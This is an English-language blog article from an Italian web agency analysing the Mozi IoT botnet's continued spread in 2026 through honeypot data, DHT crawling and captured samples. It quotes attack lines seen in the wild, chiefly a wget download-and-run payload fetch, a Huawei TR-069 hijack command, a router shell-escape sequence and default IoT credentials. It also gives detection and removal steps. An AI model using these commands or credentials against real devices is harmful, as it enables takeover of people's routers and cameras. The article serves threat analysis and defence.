Mozi Botnet Is Still Alive in 2026: IoT Botnet Analysis With Live Samples

Come web agency che gestisce decine di server per i nostri clienti, monitoriamo attivamente le minacce alla sicurezza. Questa ricerca nasce dal nostro honeypot dedicato alla threat intelligence IoT. L'articolo è in inglese per raggiungere la comunità internazionale di security researchers.

The Mozi botnet was one of the most aggressive IoT botnets ever documented, responsible for up to 90% of all IoT malware traffic at its peak. After Chinese law enforcement arrested its operators in 2021 and distributed a kill switch in August 2023, every major security vendor declared it dead.

They were wrong.

Our independent honeypot research shows that while the Mozi command-and-control network is indeed gone, the trojan.linux.mozi botnet continues to replicate autonomously across the internet. In a single 24-hour observation window on March 30, 2026, we captured 538,518 attack sessions, downloaded 5 unique Mozi samples from 15 active propagation nodes across China, Pakistan, Russia, Indonesia, Albania, Australia, and Argentina.

This article presents our complete botnet malware analysis, including the infection chain, live indicators of compromise, and what this means for IoT security in 2026.

What Is the Mozi Botnet?

The Mozi botnet is a peer-to-peer (P2P) IoT botnet first discovered in 2019 by 360 Netlab. It targets Linux-based IoT devices — home routers, IP cameras, DVRs, and network storage — by brute-forcing default credentials over Telnet and SSH.

What made Mozi unique among IoT botnets was its use of a Distributed Hash Table (DHT) for command-and-control communication, borrowed from the BitTorrent protocol. This made it extremely resilient: there was no central server to take down.

At peak activity:

• 1.5+ million infected devices worldwide
• 90% of all IoT botnet traffic (IBM X-Force, 2020)
• Primary targets: MIPS and ARM-based devices in China, India, Pakistan
• Capabilities: DDoS attacks, data exfiltration, web injection, router exploitation

The trojan.linux.mozi botnet was built from code borrowed from three earlier botnets: Mirai, Gafgyt, and IoT Reaper.

The 2023 Kill Switch: What Happened

In September 2021, Chinese law enforcement arrested the Mozi operators. In August 2023, a kill switch was distributed through Mozi's own DHT network (documented by ESET Research). The payload instructed bots to:

• Stop all scanning and propagation
• Disable the embedded HTTP server
• Replace the running binary
• Persist the shutdown via cron

This was widely reported as the end of Mozi. Security vendors removed it from active threat lists. FortiGuard, Sophos, and others stopped flagging trojan.linux.mozi botnet detections as critical.

The problem: the kill switch only reached bots that were online and participating in the DHT at the time. Devices that were temporarily offline, behind restrictive NAT, or running on read-only filesystems never received it. And when those devices came back online, they continued scanning — reinfecting neighbors who had been cleaned.

Our Research Setup: Honeypot Infrastructure

We deployed a multi-service honeypot on a Hetzner Cloud VPS in Helsinki, Finland:

The DHT crawler is a custom Python tool (1,100 lines) that participates in the BitTorrent DHT network, queries all known Mozi info_hashes, and classifies discovered peers through active probing.

All data was collected passively through our own infrastructure. No unauthorized access was attempted.

Key Finding: The Mozi DHT Command Network Is Dead

After crawling 1.46 million DHT nodes and sending over 2.25 million messages, we can confirm: the Mozi DHT C2 network is conclusively dead.

The 63 peers returned for Mozi-associated info_hashes were all either:

• Research sinkholes (25 IPs) — VPS hosting providers running passive listeners
• Offline ghosts (25 IPs) — former peers, now unreachable
• Legitimate BitTorrent clients (3 IPs) — false positives from DHT routing

We identified two large sinkhole clusters operated from Russian infrastructure (Teleport Media in Perm, Start2 LLC in Moscow) — researchers monitoring the dead network, just like us.

The kill switch succeeded in destroying Mozi's C2 layer. But that's only half the story.

Key Finding: The Worm Is Still Actively Spreading

Despite zero C2 activity, our Cowrie honeypot recorded massive scanning activity in just 24 hours:

The /i download path is the universal Mozi fingerprint — every Mozi variant since 2019 serves its binary at http://<bot_ip>:<random_high_port>/i.

We verified this by directly connecting to the top 20 download URLs and confirmed that 15 out of 20 are actively serving Mozi ELF binaries right now.

This is one of the most significant recent botnet attacks still active in 2026 — and most of the security industry has stopped watching.

The Mozi Infection Chain in 2026

The attack pattern we observe is identical to the classic Mozi replication chain from 2019-2023. It operates in 5 stages:

Stage 1: Credential Brute-Force

The bot tries default IoT credentials over Telnet (primarily) and SSH. The top 10 credential pairs hitting our honeypot:

These are the same credentials Mozi has used since 2019. No new credentials have been added, confirming that the worm is not being updated.

Stage 2: Shell Escape

After login, the bot executes a hardcoded sequence to escape restricted router CLIs:

start → enable → config terminal → system → linuxshell → su → shell → sh

This covers Cisco IOS, Huawei VRP, and generic BusyBox shells. The sequence was executed 11,985 times in our 24-hour window, identically across all attacking IPs.

Stage 3: Architecture Fingerprinting

The bot determines the target CPU architecture using a clever BusyBox trick:

/bin/busybox wget;/bin/busybox echo -ne '\x46\x5a\x5a\x49\x48\x4b'

The echo -ne outputs random bytes. If the output matches what BusyBox produces on a specific architecture (MIPS LE, MIPS BE, ARM, etc.), the bot selects the correct binary.

Stage 4: Payload Download

wget http://<bot_own_ip>:<high_port>/i

Each infected device serves its own copy of the malware via an embedded nginx HTTP server on a random high port. There is no central download server — this is pure peer-to-peer propagation.

Stage 5: Execution

The binary is executed, and the new bot immediately begins scanning for more victims. The cycle completes in seconds.

Botnet Malware Analysis: 5 Live Mozi Samples

We captured 5 unique samples from 15 active bots:

All MIPS samples are UPX-packed. The ARM sample is stripped but unpacked, providing full visibility.

ARM Sample Deep Dive

The 308 KB ARM sample (12013662...) contains the complete Mozi toolkit:

C2 Configuration Tags (unused but present):

• [cnc] — Command and control
• [atk] — Attack module
• [ss] — Scanner configuration

The C2 parsing code is fully intact. If someone were to revive the DHT network and distribute signed commands, these bots would obey.

Embedded Router Exploits:

cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer
    URL "http://127.0.0.1"
    ConnectionRequestPassword "acsMozi"

This hijacks Huawei home gateways by redirecting their TR-069 management server to localhost, locking out the ISP.

Web Injection Capability:

document.write('<script language="javascript" src="http://...

The bot can inject JavaScript into HTTP traffic passing through infected routers — potentially redirecting users or stealing credentials.

DHT Bootstrap Nodes (historical, no longer active): dht.transmissionbt.com:6881, 130.239.18.159:6881, 212.129.33.59:6881

Hardcoded DNS: 8.8.8.8 (Google), 114.114.114.114 (China 114DNS)

Active Propagation Nodes (Indicators of Compromise)

These IPs were confirmed serving Mozi binaries on March 30, 2026:

Note: These are infected victim devices (home routers, cameras), not malicious infrastructure. The owners are likely unaware.

Network Signatures:

• HTTP response: Server: nginx, Content-Type: application/zip
• Download path: /i
• Random high port (>10000, changes per device)

How to Detect Trojan.Linux.Mozi Botnet Traffic

If you manage a network and want to check for trojan.linux.mozi botnet activity:

On Your Firewall/IDS

• Outbound Telnet/SSH connections from IoT devices to random IPs (scanning)
• HTTP GET requests to random high ports with path /i
• BusyBox command patterns: /bin/busybox wget followed by /bin/busybox echo -ne

On Suspected Devices

# Check for Mozi process
ps | grep -i mozi

ls -la /var/run/.x /tmp/.x /dev/.x /dev/shm/.x 2>/dev/null

cat /etc/resolv.conf

crontab -l

Removal

Mozi does not survive a reboot on most devices. Simply power-cycling the infected device will remove the active infection. However, if the device still has default credentials, it will be reinfected within minutes.

The real fix: change default passwords and disable remote Telnet/SSH access on all IoT devices.

Why IoT Botnets Like Mozi Won't Die

Mozi is a case study in the headless worm problem. When a botnet's replication logic is fully autonomous — requiring no C2 server to spread — decapitating the command infrastructure does not stop propagation.

Mozi will continue spreading until:

1. All vulnerable devices are patched (unlikely — many are abandoned hardware)
2. All infected devices are rebooted simultaneously (impossible at scale)
3. ISPs block scanning traffic at the network level (partially happening in some countries)
4. Manufacturers ship devices with unique passwords (slowly improving, but millions of legacy devices remain)

The same default credentials that enabled Mozi in 2019 (root:xmhdipc, admin:1234, root:Zte521) still work on devices being deployed in 2026.

Until the IoT industry solves the default credential problem, headless botnets will haunt the internet indefinitely.

Full Technical Report

This article is a summary of our complete research. The full technical report — including DHT crawler methodology, sinkhole infrastructure analysis, the Go-based SSH worm we also captured, and extended sample analysis — is available as an eBook:

Mozi Is Dead, Long Live Mozi — Full Report on Amazon Kindle

For sample requests, collaboration, or consulting inquiries, connect via LinkedIn or contact us.

Domande frequenti

Fabio Russo

Founder & Web Developer — Indicaweb

Dal 2012 aiuto aziende e professionisti a crescere online con siti web, e-commerce e strategie SEO. Oltre 200 progetti realizzati a Caserta e in tutta la Campania.